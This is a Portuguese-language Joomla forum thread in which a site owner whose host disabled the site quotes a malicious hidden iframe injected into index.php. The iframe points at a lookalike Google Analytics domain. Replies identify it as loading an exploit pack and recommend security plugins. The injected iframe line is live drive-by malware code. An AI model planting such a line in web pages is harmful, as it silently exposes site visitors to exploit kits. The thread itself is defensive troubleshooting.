Acho que "invadiram" meu Joomla

  • Lipegon
  • Avatar de Lipegon Autor do Tópico
  • Offline
  • JCB! Novato
  • JCB! Novato
Mais
15 anos 5 meses atrás #31437 por Lipegon
Lipegon created the topic: Acho que "invadiram" meu Joomla
Olá amigos,

tenho um site Joomla há um bom tempo, e de repente hoje recebi um aviso do administrador da hospedagem dizendo que estava desativando o meu site por conter um arquivo malicioso.

Acontece que deu o seguinte:

Parse error: syntax error, unexpected '<' in /hermes/web08/b1670/pow.brahmsoftware/htdocs/clients/crescexavante/public_html/index.php on line 89

Encontrei isso:

<!-- ~ --><iframe src=" www.google-analytics.sebc-bi.org/el/index.php" ; width="0" height="0" frameborder="0"></iframe><!-- ~ -->

Alguém tem algum passo-a-passo para que eu siga da maneira mais segura possível?
Creio que somente remover a linha do código-fonte não deixará o sistema mais confiável <!-- s:P --><img src="{SMILIES_PATH}/icon_razz.gif" alt=":P" title="Legal" /><!-- s:P -->

Grato desde já.

Please Entrar ou Registrar to join the conversation.


Mais
15 anos 5 meses atrás #31451 por Andre MaNcHa
Andre MaNcHa replied the topic: Re: Acho que &quot;invadiram&quot; meu Joomla
Qual a finalidade desta linha de código?

Abs <!-- s:ugeek: --><img src="{SMILIES_PATH}/icon_e_ugeek.gif" alt=":ugeek:" title="Uber Geek" /><!-- s:ugeek: -->

Please Entrar ou Registrar to join the conversation.

Mais
15 anos 5 meses atrás #31461 por elvisvinicius
elvisvinicius replied the topic: Re: Acho que &quot;invadiram&quot; meu Joomla
Chama um exploit:

Eleonore Exploit Pack v1.3.2 / VirTool VBInject.DJ

Informações sobre esse domínio malicioso:
http://www.malwareurl.com/listing.php?domain=google-analytics.sebc-bi.org

Traduzi há algum tempo um plugin "milagroso" que impede que esses crackers consigam acesso ao site. Está na seção de downloads da JCB!
Instale e experimente:
System Plugin - http:BL 1.10 pt-BR

É necessário se cadastrar no Project Honey Pot para obter uma chave de segurança.


( ^ ^)

Please Entrar ou Registrar to join the conversation.

Mais
15 anos 5 meses atrás #31471 por Turdin
Turdin replied the topic: Re: Acho que &quot;invadiram&quot; meu Joomla
Um componente que ajuda muito creio ser o RS Firewall, parece que fecha o site de todas as maneiras! (não hospedar na locaweb ajuda tbm <!-- s:D --><img src="{SMILIES_PATH}/icon_e_biggrin.gif" alt=":D" title="Muito Feliz" /><!-- s:D --> )
Eu uso no meu várias diretrizes de segurança que eu mesmo criei, e o sh404sef com o project honey pot, não é tão seguro quanto o RS Firewall, mas ta segurando seus 40 ataques por dia ^^

Abraços

[url=http&#58;//www&#46;animespace&#46;com&#46;br:2atbtyfv]Animes Legendados e Dublados[/url:2atbtyfv]
[url=http&#58;//www&#46;animespace&#46;com&#46;br:2atbtyfv]Joomla Studio, desenvolvendo seu caminho para o sucesso![/url:2atbtyfv]

Please Entrar ou Registrar to join the conversation.

  • Lipegon
  • Avatar de Lipegon Autor do Tópico
  • Offline
  • JCB! Novato
  • JCB! Novato
Mais
15 anos 5 meses atrás #31472 por Lipegon
Lipegon replied the topic: Re: Acho que &quot;invadiram&quot; meu Joomla
Ok elvisvinicius, primeiramente obrigado!
Teu plugin EVITA o acesso por determinados ip's, ótimo.

Mas o que eu faço com o que já entrou e bagunçou?
Apenas deleto a linha do iframe, altero senhas e pronto?

Grato.

Please Entrar ou Registrar to join the conversation.